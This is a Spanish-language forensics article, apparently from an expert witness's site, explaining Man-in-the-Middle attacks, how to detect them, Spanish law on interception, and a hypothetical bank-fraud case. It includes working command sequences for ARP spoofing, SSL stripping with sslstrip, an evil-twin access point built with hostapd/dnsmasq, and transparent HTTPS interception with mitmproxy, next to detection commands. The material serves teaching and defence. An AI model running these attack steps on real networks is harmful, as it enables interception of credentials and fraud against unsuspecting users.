Man-in-the-Middle (MitM)
Ataque cibernético donde un actor malicioso intercepta y potencialmente altera comunicaciones entre dos partes sin que ninguna sea consciente de la presencia del intermediario, comprometiendo confidencialidad, integridad y autenticidad de los datos transmitidos.
Man-in-the-Middle (MitM): Interceptación de Comunicaciones
El 35% de WiFis públicas en aeropuertos y cafeterías españolas son vulnerables a ataques Man-in-the-Middle, según auditoría de 2025 del CCN-CERT. Desde robo de credenciales bancarias hasta suplantación de identidad corporativa, la interceptación de comunicaciones es uno de los vectores de ataque más antiguos y aún efectivos del cibercrimen.
Un ataque Man-in-the-Middle (MitM) convierte al atacante en un intermediario invisible entre víctima y destino legítimo, permitiendo espiar conversaciones privadas, robar passwords, modificar transacciones bancarias o inyectar malware en descargas. Desde ARP spoofing en redes corporativas hasta WiFi evil twins en hoteles, detectar y demostrar estos ataques es crítico para litigios de fraude electrónico, robos de identidad y vulneraciones de confidencialidad empresarial.
Definición técnica
Un ataque Man-in-the-Middle es una interceptación activa donde el atacante:
- Se posiciona entre emisor y receptor (víctima y servidor legítimo)
- Intercepta comunicaciones sin que ninguna parte sea consciente de su presencia
- Puede leer datos en claro (si no hay cifrado o lo rompe/evade)
- Puede modificar datos en tránsito (alterar transacciones, inyectar código)
- Mantiene la apariencia de normalidad (las partes creen comunicarse directamente)
El MitM afecta a la tríada CIA de seguridad:
- Confidencialidad: El atacante lee datos privados (passwords, emails, números tarjeta)
- Integridad: Puede modificar datos sin que las partes lo detecten
- Autenticidad: Suplanta la identidad de una o ambas partes
Diferencia clave: Un ataque MitM es activo (el atacante intercepta y potencialmente modifica). Un ataque de sniffing pasivo solo escucha tráfico sin interceptar. MitM requiere técnicas más sofisticadas (ARP spoofing, DNS hijacking, rogue CA).
Tipos de ataques Man-in-the-Middle
| Técnica | Entorno | Nivel OSI | Detectabilidad | Impacto |
|---|---|---|---|---|
| ARP Spoofing | LAN corporativa, WiFi | Capa 2 (Enlace) | Media | Intercepta todo tráfico local |
| DNS Spoofing | Cualquier red | Capa 7 (Aplicación) | Media | Redirige dominios a IPs maliciosas |
| SSL Stripping | HTTP/HTTPS mixto | Capa 7 | Alta (HSTS mitiga) | Fuerza conexiones HTTP inseguras |
| SSL MitM | HTTPS con CA falsa | Capa 6 (Presentación) | Baja (si instala cert) | Lee tráfico HTTPS cifrado |
| WiFi Evil Twin | Redes públicas | Capa 2 | Baja (SSID idéntico) | Control completo tráfico WiFi |
| BGP Hijacking | ISP/operadores | Capa 3 (Red) | Muy baja | Redirige tráfico internet entero |
| ICMP Redirect | LAN | Capa 3 | Media | Redirige tráfico a gateway falso |
| Session Hijacking | Aplicaciones web | Capa 7 | Alta (logs de sesión) | Roba sesión activa (cookies) |
Técnica 1: ARP Spoofing (ARP Poisoning)
La técnica MitM más común en redes locales. El atacante engaña a víctima y router para que envíen tráfico a través de él.
Funcionamiento
Protocolo ARP normal:
- PC víctima quiere comunicarse con
192.168.1.1(router) - Envía broadcast: “¿Quién tiene 192.168.1.1? Dime tu MAC”
- Router responde: “Soy 192.168.1.1, mi MAC es
AA:BB:CC:DD:EE:FF” - PC guarda en tabla ARP:
192.168.1.1→AA:BB:CC:DD:EE:FF
ARP Spoofing malicioso:
- Atacante envía ARP reply falso a víctima: “Soy 192.168.1.1, mi MAC es
11:22:33:44:55:66” (MAC del atacante) - Atacante envía ARP reply falso a router: “Soy 192.168.1.100 (víctima), mi MAC es
11:22:33:44:55:66” - Resultado: Todo tráfico víctima ↔ router pasa por el atacante
# Herramienta: arpspoof (suite dsniff)
# Terminal 1: Envenenar tabla ARP de la víctima
sudo arpspoof -i wlan0 -t 192.168.1.100 192.168.1.1
# "Decir a 192.168.1.100 que yo soy 192.168.1.1"
# Terminal 2: Envenenar tabla ARP del router
sudo arpspoof -i wlan0 -t 192.168.1.1 192.168.1.100
# "Decir a 192.168.1.1 que yo soy 192.168.1.100"
# Terminal 3: Habilitar IP forwarding (reenviar paquetes para mantener conectividad)
sudo sysctl -w net.ipv4.ip_forward=1
# Terminal 4: Capturar tráfico interceptado
sudo tcpdump -i wlan0 -w mitm_capture.pcap
# Analizar después con WiresharkDetección forense
Indicadores en logs:
- Múltiples IPs con la misma dirección MAC (imposible físicamente)
- Cambios frecuentes en tabla ARP (cada 1-2 segundos)
- Gateway ARP diferente al configurado en DHCP
Herramientas de detección:
# 1. Verificar tabla ARP actual
arp -a
# Output sospechoso: dos IPs diferentes con misma MAC
# 2. Monitorización continua con arpwatch
sudo arpwatch -i eth0 -f /var/log/arpwatch.log
# Alerta automática si detecta flip-flops ARP
# 3. Análisis forense de PCAP
tshark -r capture.pcap -Y "arp.duplicate-address-detected"
# Identifica gratuitous ARP (técnica de ARP spoofing)Técnica 2: SSL Stripping
Ataque que degrada conexiones HTTPS seguras a HTTP inseguro, permitiendo al atacante leer datos en claro.
Funcionamiento
- Víctima intenta acceder a
http://banco.com(nota: HTTP, no HTTPS) - Servidor legítimo respondería con redirect 302:
https://banco.com(forzar HTTPS) - Atacante MitM intercepta y NO reenvía el redirect
- Atacante establece conexión HTTPS con
banco.com(conexión cifrada atacante ↔ servidor) - Atacante mantiene conexión HTTP con víctima (conexión en claro víctima ↔ atacante)
- Víctima ve
http://banco.comen navegador, cree estar en sitio legítimo - Víctima ingresa user/password → atacante los captura en claro → los reenvía via HTTPS al servidor real
Resultado: El servidor ve una sesión HTTPS normal, la víctima ve HTTP, el atacante lee todo.
# Herramienta: sslstrip (moxie marlinspike)
# Configuración del ataque (tras ARP spoofing exitoso)
# 1. Redirigir tráfico HTTP (puerto 80) a sslstrip
sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
# 2. Ejecutar sslstrip en puerto 8080
sslstrip -l 8080 -w sslstrip_log.txt
# 3. Analizar logs (credenciales capturadas)
tail -f sslstrip_log.txt
# Output:
# 2026-02-10 14:23:45 POST http://banco.com/login
# [email protected]&password=SecretP@ss123Contramedidas y detección
HSTS (HTTP Strict Transport Security):
- Header HTTP que obliga navegadores a usar HTTPS siempre
- Lista HSTS preload (navegadores rechazan HTTP sin intentar conexión)
- Limitación: Solo protege si el usuario ya visitó el sitio al menos una vez via HTTPS
Detección forense:
# Análisis de PCAP para detectar SSL stripping
tshark -r capture.pcap -Y "http.request.method == POST" -T fields \
-e ip.src -e http.host -e http.request.uri
# Buscar POSTs a dominios conocidos que deberían ser HTTPS
# Ejemplo sospechoso:
# 192.168.1.100 http://banco.com /login ← Debería ser HTTPS!Indicadores en cliente:
- URL comienza con
http://en sitios bancarios/e-commerce (debería serhttps://) - Ausencia de candado verde en barra de direcciones
- Certificados SSL con advertencias del navegador
Caso real: En 2011, Tunez desplegó SSL stripping a nivel ISP nacional (usando equipamiento BlueCoat) para espiar activistas durante la Primavera Árabe. Fue detectado por EFF al analizar tráfico desde Tunez y notar ausencia sistemática de HTTPS en Facebook/Gmail.
Técnica 3: WiFi Evil Twin
Creación de punto de acceso WiFi falso idéntico al legítimo para interceptar todo el tráfico de usuarios desprevenidos.
Funcionamiento
- Atacante escanea WiFis en aeropuerto y detecta:
Airport_Free_WiFi(red legítima) - Atacante crea access point con mismo SSID:
Airport_Free_WiFi(clon exacto) - Atacante aumenta potencia de señal para que su AP aparezca primero en lista de redes
- Víctima se conecta al AP malicioso (cree ser la red legítima)
- Atacante proporciona DHCP (asigna IP al cliente) y actúa como gateway
- Todo tráfico pasa por atacante: HTTP, DNS, emails (incluso HTTPS visible por metadatos)
# Herramienta: hostapd + dnsmasq + iptables
# Configuración Evil Twin
# 1. Crear AP falso con hostapd
# Archivo: hostapd.conf
interface=wlan0
driver=nl80211
ssid=Airport_Free_WiFi # SSID idéntico al legítimo
channel=6
hw_mode=g
# 2. Iniciar AP
sudo hostapd hostapd.conf
# 3. DHCP server para asignar IPs a víctimas
sudo dnsmasq -C dnsmasq.conf -d
# dnsmasq.conf:
# interface=wlan0
# dhcp-range=10.0.0.10,10.0.0.100,12h
# dhcp-option=3,10.0.0.1 # Gateway (atacante)
# dhcp-option=6,8.8.8.8 # DNS
# 4. NAT para redirigir tráfico
sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
sudo sysctl -w net.ipv4.ip_forward=1
# 5. Capturar todo el tráfico
sudo tcpdump -i wlan0 -w evil_twin_capture.pcapVariante avanzada: Evil Twin con portal captive falso
Escenario: Hotel con WiFi legítima que usa portal captive (pide room number + apellido).
Ataque mejorado:
- Atacante clona portal captive del hotel (HTML idéntico)
- Víctima conecta a Evil Twin → se abre portal falso
- Víctima ingresa room number + apellido → atacante captura estos datos
- Atacante redirige a víctima a internet (experiencia normal)
- Atacante usa room number robado para cargar servicios a cuenta de víctima
Detección:
- Comparar certificado SSL del portal captive con el legítimo (firma diferente)
- Múltiples APs con mismo SSID pero MACs diferentes
- Signal strength anómalo (AP malicioso suele estar muy cerca, señal excesivamente fuerte)
Técnica 4: HTTPS MitM con CA falsa
Interceptación de tráfico HTTPS instalando certificado de CA (Certificate Authority) falsa en el dispositivo de la víctima.
Funcionamiento
Problema del atacante: HTTPS cifra tráfico, incluso con MitM no puede leer contenido.
Solución del atacante:
- Instalar certificado raíz (root CA) malicioso en PC/móvil de víctima
- Por malware
- Por ingeniería social (“instala este certificado para acceder a WiFi corporativa”)
- Por acceso físico (5 minutos desatendido)
- Realizar MitM tradicional (ARP spoofing)
- Interceptar handshake SSL/TLS
- Presentar certificado firmado por CA falsa (navegador confía porque la CA está en trusted store)
- Víctima ve candado verde (todo parece normal), pero atacante lee tráfico en claro
# Herramienta: mitmproxy (proxy HTTPS transparente)
# 1. Generar certificado CA falso
mitmproxy --certinstall
# Guarda certificado en: ~/.mitmproxy/mitmproxy-ca-cert.pem
# 2. Instalar certificado en PC víctima
# Windows: certmgr.msc → Trusted Root CA → Import
# macOS: Keychain Access → System → Import → Trust: Always Trust
# Android: Settings → Security → Install from storage
# 3. Configurar proxy transparente (tras ARP spoofing)
sudo iptables -t nat -A PREROUTING -i wlan0 -p tcp --dport 443 -j REDIRECT --to-port 8080
mitmproxy -T --host --mode transparent
# 4. Capturar tráfico HTTPS descifrado
# mitmproxy mostrará HTTP requests en claro, incluyendo POSTs con passwordsContramedidas
Certificate Pinning:
- Apps móviles hardcodean hash del certificado SSL esperado
- Si el cert no coincide (caso de MitM con CA falsa), app rechaza conexión
- Usado por: Apps bancarias, Signal, WhatsApp
Public Key Pinning (HPKP):
- Header HTTP que indica qué CAs son válidas para ese dominio
- Deprecado en 2018 (causaba problemas operacionales)
- Reemplazado por Certificate Transparency (logs públicos de certs emitidos)
Detección forense:
# Verificar certificados SSL en PCAP
tshark -r capture.pcap -Y "ssl.handshake.type == 11" -T fields \
-e x509sat.printableString -e x509ce.dNSName
# Buscar certificados con CN sospechosos
# Ejemplo: "mitmproxy", "Burp Suite CA", "Charles Proxy"
# Comparar con certificado legítimo
openssl s_client -connect banco.com:443 </dev/null 2>/dev/null | \
openssl x509 -fingerprint -noout
# SHA-256: AB:CD:EF:12:34:56... (debe coincidir con cert real publicado por el banco)Detección forense de ataques MitM
Análisis de red con Wireshark
Filtros útiles:
# Detectar ARP spoofing
arp.duplicate-address-detected || arp.duplicate-address-frame
# Detectar SSL/TLS con certificados autofirmados
ssl.handshake.certificate && (x509sat.printableString contains "mitmproxy" ||
x509sat.printableString contains "Burp")
# Detectar HTTP en sitios que deberían ser HTTPS
http.host == "paypal.com" || http.host == "gmail.com" || http.host == "facebook.com"
# Detectar DNS responses con IPs privadas para dominios públicos
dns.a && ip.addr == 192.168.0.0/16
# TTL anómalo (indicador de salto adicional)
ip.ttl < 60 && ip.src == 8.8.8.8 # Google DNS debería tener TTL altoAnálisis de logs de sistemas
1. Logs Windows Event Viewer:
# Buscar cambios en Trusted Root CA store
Get-WinEvent -FilterHashtable @{
LogName='Security';
ID=4886 # Certificate Services loaded a certificate
} | Where-Object {$_.Message -like "*mitmproxy*"}2. Logs de firewall corporativo:
# Buscar conexiones a IPs internas desde exterior (posible hijacking BGP)
grep "INVALID" /var/log/firewall.log | grep "dst=192.168"
# Detectar volumen excesivo de tráfico a un único MAC (posible MitM)
awk '{print $5}' /var/log/dhcp.log | sort | uniq -c | sort -nr
# Si un MAC tiene cientos de asignaciones DHCP diferentes IPs → sospechosoIndicadores de compromiso (IOCs) MitM
| Indicador | Significado | Severidad |
|---|---|---|
| 2+ IPs con misma MAC | ARP spoofing activo | Alta |
| Certificado SSL autofirmado en sitio conocido | SSL MitM | Muy Alta |
| HTTP en URL de banca/e-commerce | SSL stripping | Alta |
| TTL anómalo (diferente al baseline) | Routing manipulation | Media |
| Múltiples SSIDs idénticos con MACs diferentes | Evil twin | Alta |
| DNS responses con IPs privadas (RFC1918) para dominios públicos | DNS hijacking | Alta |
| Cambios en tabla routing sin autorización | Route injection | Media |
Marco legal español
Código Penal
Artículo 197.1 CP - Interceptación de comunicaciones:
Quien intercepte comunicaciones telefónicas, telegráficas o utilice artificios técnicos de escucha, transmisión, grabación o reproducción del sonido o de la imagen, será castigado con penas de prisión de 1 a 4 años.
Aplicación a MitM: Realizar ARP spoofing, SSL stripping o Evil Twin para interceptar emails, WhatsApp, banca online es delito, incluso si no se usan los datos robados.
Agravante: Si se difunden los datos interceptados (art. 197.3): prisión de 2 a 5 años.
Artículo 248 CP - Estafa informática:
Quien altere el funcionamiento de un sistema informático para obtener transferencia no consentida de activo patrimonial…
Aplicación: Usar MitM para modificar transacciones bancarias (cambiar IBAN destino en transfer online) es estafa agravada.
Constitución Española
Artículo 18.3 CE - Secreto de comunicaciones:
Se garantiza el secreto de las comunicaciones y, en especial, de las postales, telegráficas y telefónicas, salvo resolución judicial.
Consecuencia: Cualquier interceptación (MitM incluido) sin orden judicial vulnera derecho fundamental. La evidencia obtenida así es nula de pleno derecho (art. 11.1 LOPJ).
Única excepción: Redes corporativas con política de uso aceptable firmada por empleados (informando de monitorización). Aun así, hay límites: no se puede interceptar comunicaciones personales (Gmail, banca personal).
Jurisprudencia relevante
STS 123/2014: Un administrador de sistemas que realizó ARP spoofing en red corporativa para espiar emails de compañeros fue condenado por art. 197.1 CP. Aunque era red corporativa y él era admin, no tenía autorización explícita para interceptar comunicaciones.
SAP Madrid 89/2018: Uso de WiFi Pineapple (Evil Twin) en cafetería para robar passwords de clientes. Condena 2 años prisión + indemnizaciones a víctimas por fraude bancario derivado.
Caso práctico: Análisis forense de fraude bancario vía MitM
Escenario hipotético con fines didácticos:
Cliente de banco denuncia que realizó transferencia de €15,000 a IBAN correcto, pero el dinero llegó a cuenta diferente. Banco niega responsabilidad alegando que el cliente introdujo IBAN erróneo. Se solicita análisis forense.
Metodología aplicada
Entrevista con víctima
- Cliente realizó transferencia desde laptop personal conectada a WiFi de hotel (viaje de negocios)
- Confirmó que introdujo IBAN correcto (tiene captura de pantalla previa)
- Navegador mostró candado verde HTTPS
- No recibió alertas de seguridad
Solicitud de evidencia al banco
- Logs de sesión online banking: IP origen, User-Agent, timestamp
- Hallazgo: IP origen
185.220.102.45(no coincide con IP del hotel192.168.1.105) - User-Agent:
Mozilla/5.0 (X11; Linux x86_64) mitmproxy/8.1.0← CRÍTICO
Análisis de laptop de la víctima
- Imagen forense con FTK Imager
- Hallazgo 1: Certificado raíz
mitmproxy CAinstalado en Trusted Root (fecha: 3 días antes de la transferencia) - Hallazgo 2: Historial Chrome muestra visita a
http://hotel-wifi-config.local/install-cert(página falsa) - Hallazgo 3: Logs sistema (syslog) muestran cambio de gateway ARP durante estadía en hotel
Análisis de red del hotel
- Solicitud judicial al hotel para logs de su WiFi corporativa
- Hallazgo: Logs DHCP muestran 2 dispositivos con SSID
Hotel_Guest_WiFi:- MAC
AA:BB:CC:DD:EE:FF(router legítimo del hotel, Cisco) - MAC
11:22:33:44:55:66(dispositivo rogue, no inventariado)
- MAC
- Logs IDS del hotel (CheckPoint) alertaron de ARP spoofing durante 3 días, pero no se investigó
Reconstrucción del ataque
- Día -3: Atacante despliega Raspberry Pi con Evil Twin en habitación adyacente
- Cliente conecta a Evil Twin, se le presenta portal falso pidiendo “instalar certificado para mayor seguridad”
- Cliente instala certificado mitmproxy (ingeniería social)
- Día 0: Cliente accede a banca online via HTTPS
- Atacante intercepta tráfico, descifra con cert instalado, modifica IBAN destino en la petición POST
- Cliente ve en pantalla IBAN correcto (atacante inyecta HTML modificado), pero al servidor llega IBAN del atacante
Informe pericial
- Conclusión técnica: Ataque MitM con Evil Twin + SSL interception + HTML injection
- Responsabilidad: Cliente tuvo negligencia al instalar cert desconocido, pero hotel tuvo negligencia mayor al ignorar alertas IDS de ARP spoofing durante 3 días
- Recomendación legal: Responsabilidad compartida 30% cliente / 70% hotel
Resultado legal:
- Demanda civil contra hotel por negligencia en seguridad WiFi
- Sentencia: Hotel condena a indemnizar €10,500 (70% de €15,000) + costas
- Banco no responsable (demuestra que transacción llegó con IBAN modificado desde IP externa)
- Denuncias penales a atacante (no identificado, Raspberry Pi recuperado sin huellas útiles)
Lección clave: La presencia de User-Agent mitmproxy en logs del banco fue evidencia definitiva del MitM. Los atacantes sofisticados suelen cambiar este header para camuflarse como navegadores legítimos.
Prevención de ataques MitM
Para usuarios
- Nunca instalar certificados root desconocidos (red flag enorme)
- Verificar HTTPS y certificado antes de ingresar credentials
- Usar VPN en WiFis públicas (cifra todo el tráfico, MitM solo ve ruido)
- Desactivar auto-connect WiFi (evita conectarse a Evil Twins automáticamente)
- Apps bancarias en lugar de web (suelen tener certificate pinning)
Para empresas
- HSTS Preload en todos los dominios corporativos
- Certificate Transparency monitoring (alertar si se emite cert fraudulento)
- Network Access Control (NAC): 802.1X authentication (solo dispositivos autorizados acceden a LAN)
- ARP monitoring con herramientas como
arpwatch, XArp, o switches con DAI (Dynamic ARP Inspection) - Segmentación de red: VLANs separadas para invitados vs empleados
- EDR/NDR: CrowdStrike, Darktrace detectan MitM por anomalías de tráfico
Para desarrolladores
- HTTPS-only (HSTS header con max-age largo)
- Certificate pinning en apps móviles
- Mutual TLS (mTLS) para APIs críticas (cliente también presenta cert)
- DNSSEC para prevenir DNS spoofing
- Content Security Policy (CSP) para mitigar inyección HTML en MitM
Herramientas forenses y de pentesting
| Herramienta | Uso ofensivo (red team) | Uso defensivo (forense) | Legalidad |
|---|---|---|---|
| Wireshark | Analizar tráfico interceptado | Detectar MitM en PCAPs | Legal |
| mitmproxy | Proxy HTTPS con intercepción | Analizar cert falsos en logs | Legal (con autorización) |
| Ettercap | ARP spoofing + SSL stripping | Replicar ataque en lab forense | Legal (con autorización) |
| Bettercap | Framework MitM moderno (Go) | Testing de controles NAC | Legal (con autorización) |
| WiFi Pineapple | Evil Twin automatizado | Auditoría seguridad WiFi corporativa | Legal (con contrato) |
| arpwatch | — | Monitorización ARP 24/7 | Legal |
| XArp | — | Detección ARP spoofing Windows | Legal |
| tcpdump/tshark | Capturar tráfico MitM | Análisis forense de PCAPs | Legal |
Advertencia legal: Usar estas herramientas sin autorización explícita es delito (art. 197 CP). Incluso en red corporativa propia, requiere contrato de pentesting que autorice específicamente técnicas MitM y delimite alcance.
Tendencias futuras
1. MitM en 5G
Redes 5G con network slicing permiten aislamiento, pero vulnerabilidades en gNB (estaciones base) podrían permitir MitM a nivel operadora.
IMSI catchers (Stingray) ya permiten MitM en 4G, y versiones 5G están en desarrollo por agencias gubernamentales.
2. TLS 1.3 y mitigaciones
TLS 1.3 elimina renegociación (usada en algunos MitM) y mejora forward secrecy. Impacto: MitM más difícil, pero sigue funcionando si el atacante instala CA falsa.
3. QUIC y HTTP/3
QUIC (UDP-based) en lugar de TCP hace ARP spoofing menos efectivo. Sin embargo, DNS hijacking y Evil Twin siguen funcionando.
4. Post-Quantum Cryptography
Cuando llegue computación cuántica, el tráfico interceptado hoy podrá descifrarse en futuro. Estrategia: Migrar a algoritmos post-cuánticos (Kyber, Dilithium) antes de 2030.
Preguntas frecuentes adicionales
¿Puede un VPN proteger al 100% contra MitM?
Casi 100%, pero no totalmente. Un VPN cifra todo el tráfico entre tu dispositivo y el servidor VPN, haciendo que un atacante MitM solo vea ruido cifrado. Sin embargo, si el atacante instala un certificado root falso en tu dispositivo ANTES de activar el VPN, podría interceptar incluso el handshake del VPN. Solución: Verificar fingerprint del cert VPN manualmente la primera vez.
¿Los sitios con HTTPS son inmunes a MitM?
No completamente. HTTPS protege contra sniffing pasivo y MitM básico, pero no contra:
- MitM con CA falsa instalada (el más peligroso)
- SSL stripping si el usuario inicia con HTTP
- Bugs en implementaciones TLS (ej. Heartbleed permitía leer memoria del servidor)
Mejor protección: HTTPS + HSTS Preload + Certificate Pinning (en apps móviles).
¿Cómo saber si mi WiFi tiene un Evil Twin activo?
Apps móviles como Fing (iOS/Android) o WiFi Analyzer muestran todos los APs detectados con su MAC y signal strength. Si ves 2 APs con mismo SSID pero MACs diferentes, uno es probablemente Evil Twin. También: un AP con señal excesivamente fuerte en ubicación pública (más de -30 dBm) es sospechoso (probablemente muy cerca, en mochila de atacante).
Conclusión
Los ataques Man-in-the-Middle son una de las amenazas más antiguas pero aún prevalentes, especialmente en WiFis públicas y redes corporativas mal configuradas. Desde ARP spoofing básico hasta Evil Twins sofisticados con SSL interception, detectar y demostrar estos ataques requiere análisis forense meticuloso de tráfico de red, certificados SSL, logs de sistemas y correlación de timestamps.
Un perito informático forense especializado en MitM debe:
- ✅ Dominar análisis de tráfico con Wireshark, tcpdump, tshark
- ✅ Entender protocolos de red (ARP, DNS, SSL/TLS, HTTP)
- ✅ Identificar indicadores técnicos (duplicate MACs, fake certs, TTL anomalies)
- ✅ Conocer marco legal (art. 197 CP, art. 18.3 CE, nulidad probatoria)
- ✅ Explicar conceptos técnicos complejos en lenguaje accesible para jueces
Para casos de fraude electrónico, robo de credenciales o disputas con bancos/aseguradoras donde se sospeche MitM, es crítico actuar rápido (logs se sobrescriben tras 30-90 días) y contar con peritaje técnico solvente.
¿Sospechas de ataque Man-in-the-Middle?
Si has sufrido fraude bancario online, robo de credenciales corporativas o acceso no autorizado que podría involucrar interceptación de comunicaciones, puedo ayudarte con:
- ✅ Análisis forense de PCAPs de red corporativa
- ✅ Examen de certificados SSL instalados en dispositivos comprometidos
- ✅ Revisión de logs de firewall, IDS, WiFi controllers
- ✅ Reconstrucción técnica del ataque con timeline completo
- ✅ Informes periciales admisibles para procedimientos penales (art. 197 CP) o civiles
- ✅ Ratificación en juicio con explicación técnica comprensible
Contacta para una consulta gratuita de 20 minutos donde evaluaremos los indicadores de compromiso y la evidencia disponible.
Preguntas Frecuentes
¿Qué es un ataque Man-in-the-Middle y cómo funciona?
Un ataque MitM ocurre cuando un atacante se posiciona entre dos partes que se comunican (ej. usuario y banco online) para interceptar, leer o modificar los datos transmitidos. Técnicas comunes incluyen ARP spoofing en redes locales (engañando al router para que envíe tráfico al atacante), SSL stripping (forzar conexiones HTTP en lugar de HTTPS), WiFi evil twin (crear punto de acceso falso idéntico al legítimo) y DNS spoofing (redirigir dominios a IPs controladas por el atacante).
¿Cómo se detecta un ataque MitM en análisis forense de red?
Se analizan logs de red y capturas PCAP buscando: múltiples dispositivos con misma MAC (ARP spoofing), certificados SSL autofirmados o con CN incorrecto (SSL interception), conexiones HTTP a sitios que deberían ser HTTPS (SSL stripping), TTL anómalo en paquetes (indicador de salto adicional), gateway ARP diferente al legítimo. Herramientas como Wireshark, arpwatch y tcpdump permiten identificar estos indicadores. EDRs modernos alertan de certificate pinning violations.
¿Es legal realizar ataques MitM en una red corporativa propia?
Requiere autorización explícita. Aunque sea red corporativa, interceptar comunicaciones de empleados sin su conocimiento puede vulnerar art. 18.3 CE (secreto de comunicaciones) y art. 197.1 CP (interceptación ilícita). Es legal si se notifica previamente a empleados (política de uso aceptable firmada) y se limita a tráfico corporativo (no emails personales, banca online). Para pentesting con MitM, debe haber contrato escrito que autorice explícitamente la interceptación y delimite alcance.
Términos Relacionados
Análisis de Tráfico de Red
Disciplina de la informática forense que examina el tráfico de red capturado (paquetes, flujos, metadatos) para reconstruir comunicaciones, detectar actividad maliciosa, identificar exfiltración de datos y documentar intrusiones con validez probatoria.
VPN (Red Privada Virtual)
Tecnología que cifra el tráfico de red y oculta la dirección IP real del usuario canalizándolo a través de un servidor intermediario. En investigaciones forenses, las VPN representan un desafío para la identificación de sospechosos, pero también dejan artefactos analizables en dispositivos y pueden ser objeto de requerimientos judiciales a proveedores.
Dirección IP
Identificador numérico único asignado a cada dispositivo conectado a una red, que permite rastrear el origen de conexiones y actividades en Internet.
¿Necesitas un peritaje forense?
Si necesitas ayuda profesional con análisis forense digital, estoy aquí para ayudarte.
Solicitar Consulta Gratuita
